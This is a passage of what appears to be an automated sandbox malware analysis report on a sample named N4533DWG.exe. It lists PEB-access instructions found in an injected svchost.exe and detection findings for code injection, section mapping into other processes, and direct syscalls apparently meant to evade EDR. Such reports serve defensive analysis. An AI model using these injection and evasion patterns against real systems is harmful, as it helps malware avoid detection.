                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h]2_2_02FACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]2_2_02F6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]2_2_02F6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]2_2_02F6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDEA60 mov eax, dword ptr fs:[00000030h]2_2_02FDEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h]2_2_02F40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h]2_2_02F40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h]2_2_02F54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h]2_2_02F54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA38 mov eax, dword ptr fs:[00000030h]2_2_02F6CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA24 mov eax, dword ptr fs:[00000030h]2_2_02F6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EA2E mov eax, dword ptr fs:[00000030h]2_2_02F5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCA11 mov eax, dword ptr fs:[00000030h]2_2_02FBCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]2_2_02F38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]2_2_02F38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]2_2_02F38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EBFC mov eax, dword ptr fs:[00000030h]2_2_02F5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]2_2_02FBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]2_2_02FDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]2_2_02F50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]2_2_02F50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]2_2_02F50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]2_2_02F30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]2_2_02F30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]2_2_02F30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h]2_2_02F40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h]2_2_02F40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004A80 mov eax, dword ptr fs:[00000030h]2_2_03004A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2CB7E mov eax, dword ptr fs:[00000030h]2_2_02F2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDEB50 mov eax, dword ptr fs:[00000030h]2_2_02FDEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h]2_2_02FC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h]2_2_02FC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFAB40 mov eax, dword ptr fs:[00000030h]2_2_02FFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD8B42 mov eax, dword ptr fs:[00000030h]2_2_02FD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h]2_2_02F5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h]2_2_02F5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]2_2_02FF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]2_2_02FF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]2_2_02F6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]2_2_02F6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]2_2_02FFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]2_2_02F5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC89D mov eax, dword ptr fs:[00000030h]2_2_02FBC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30887 mov eax, dword ptr fs:[00000030h]2_2_02F30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]2_2_02FBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]2_2_02FBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]2_2_02FC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]2_2_02FC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60854 mov eax, dword ptr fs:[00000030h]2_2_02F60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]2_2_02F34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]2_2_02F34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov ecx, dword ptr fs:[00000030h]2_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A830 mov eax, dword ptr fs:[00000030h]2_2_02F6A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]2_2_02FD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]2_2_02FD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC810 mov eax, dword ptr fs:[00000030h]2_2_02FBC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]2_2_02F629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]2_2_02F629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]2_2_02FBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F649D0 mov eax, dword ptr fs:[00000030h]2_2_02F649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]2_2_02FFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC69C0 mov eax, dword ptr fs:[00000030h]2_2_02FC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB89B3 mov esi, dword ptr fs:[00000030h]2_2_02FB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]2_2_02FB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]2_2_02FB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]2_2_02F309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]2_2_02F309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]2_2_02FD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]2_2_02FD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC97C mov eax, dword ptr fs:[00000030h]2_2_02FBC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]2_2_02F56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]2_2_02F56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]2_2_02F56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E mov eax, dword ptr fs:[00000030h]2_2_02F7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E mov edx, dword ptr fs:[00000030h]2_2_02F7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E mov eax, dword ptr fs:[00000030h]2_2_02F7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0946 mov eax, dword ptr fs:[00000030h]2_2_02FB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB892A mov eax, dword ptr fs:[00000030h]2_2_02FB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC892B mov eax, dword ptr fs:[00000030h]2_2_02FC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC912 mov eax, dword ptr fs:[00000030h]2_2_02FBC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28918 mov eax, dword ptr fs:[00000030h]2_2_02F28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28918 mov eax, dword ptr fs:[00000030h]2_2_02F28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE908 mov eax, dword ptr fs:[00000030h]2_2_02FAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE908 mov eax, dword ptr fs:[00000030h]2_2_02FAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68EF5 mov eax, dword ptr fs:[00000030h]2_2_02F68EF5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]2_2_02F36EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]2_2_02F36EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]2_2_02F36EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]2_2_02F36EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FCAEB0 mov eax, dword ptr fs:[00000030h]2_2_02FCAEB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FCAEB0 mov eax, dword ptr fs:[00000030h]2_2_02FCAEB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]2_2_02FBCEA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]2_2_02FBCEA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]2_2_02FBCEA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2AE90 mov eax, dword ptr fs:[00000030h]2_2_02F2AE90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2AE90 mov eax, dword ptr fs:[00000030h]2_2_02F2AE90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2AE90 mov eax, dword ptr fs:[00000030h]2_2_02F2AE90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004F68 mov eax, dword ptr fs:[00000030h]2_2_03004F68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F62E9C mov eax, dword ptr fs:[00000030h]2_2_02F62E9C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F62E9C mov ecx, dword ptr fs:[00000030h]2_2_02F62E9C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36E71 mov eax, dword ptr fs:[00000030h]2_2_02F36E71
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0E7F mov eax, dword ptr fs:[00000030h]2_2_02FB0E7F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0E7F mov eax, dword ptr fs:[00000030h]2_2_02FB0E7F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0E7F mov eax, dword ptr fs:[00000030h]2_2_02FB0E7F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30E7D mov eax, dword ptr fs:[00000030h]2_2_02F30E7D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2EE5A mov eax, dword ptr fs:[00000030h]2_2_02F2EE5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6E20 mov eax, dword ptr fs:[00000030h]2_2_02FC6E20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6E20 mov eax, dword ptr fs:[00000030h]2_2_02FC6E20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6E20 mov ecx, dword ptr fs:[00000030h]2_2_02FC6E20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004FE7 mov eax, dword ptr fs:[00000030h]2_2_03004FE7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28E1D mov eax, dword ptr fs:[00000030h]2_2_02F28E1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5AE00 mov eax, dword ptr fs:[00000030h]2_2_02F5AE00
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003681D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_003681D4
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0033A2A4 SetUnhandledExceptionFilter,0_2_0033A2A4
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0033A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0033A2D5

                HIPS / PFW / Operating System Protection Evasion

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 204.79.197.203 443
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtAllocateVirtualMemory: Direct from: 0x77172BFCJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtDelayExecution: Direct from: 0x77172DDCJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtProtectVirtualMemory: Direct from: 0x77167B2EJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtQuerySystemInformation: Direct from: 0x77172DFCJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtReadFile: Direct from: 0x77172ADCJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtQueryInformationProcess: Direct from: 0x77172C26Jump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtResumeThread: Direct from: 0x77172FBCJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtWriteVirtualMemory: Direct from: 0x7717490CJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtCreateUserProcess: Direct from: 0x7717371CJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtOpenKeyEx: Direct from: 0x77172B9CJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtNotifyChangeKey: Direct from: 0x77173C2CJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtSetInformationProcess: Direct from: 0x77172C5CJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtProtectVirtualMemory: Direct from: 0x77172F9CJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtResumeThread: Direct from: 0x771736ACJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtMapViewOfSection: Direct from: 0x77172D1CJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtWriteVirtualMemory: Direct from: 0x77172E3CJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtCreateMutant: Direct from: 0x771735CCJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtDeviceIoControlFile: Direct from: 0x77172AECJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtAllocateVirtualMemory: Direct from: 0x77172BECJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtTerminateThread: Direct from: 0x77172FCCJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtQueryInformationToken: Direct from: 0x77172CACJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtCreateFile: Direct from: 0x77172FECJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtOpenFile: Direct from: 0x77172DCCJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtClose: Direct from: 0x77172B6C
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtSetInformationThread: Direct from: 0x771663F9Jump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtAllocateVirtualMemory: Direct from: 0x77173C9CJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtQueryAttributesFile: Direct from: 0x77172E6CJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtSetInformationThread: Direct from: 0x77172B4CJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtReadVirtualMemory: Direct from: 0x77172E8CJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtCreateKey: Direct from: 0x77172C6CJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtQueryVolumeInformationFile: Direct from: 0x77172F2CJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtAllocateVirtualMemory: Direct from: 0x771748ECJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtQuerySystemInformation: Direct from: 0x771748CCJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exeNtOpenSection: Direct from: 0x77172E0CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\N4533DWG.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\where.exe protection: execute and read and writeJump to behavior
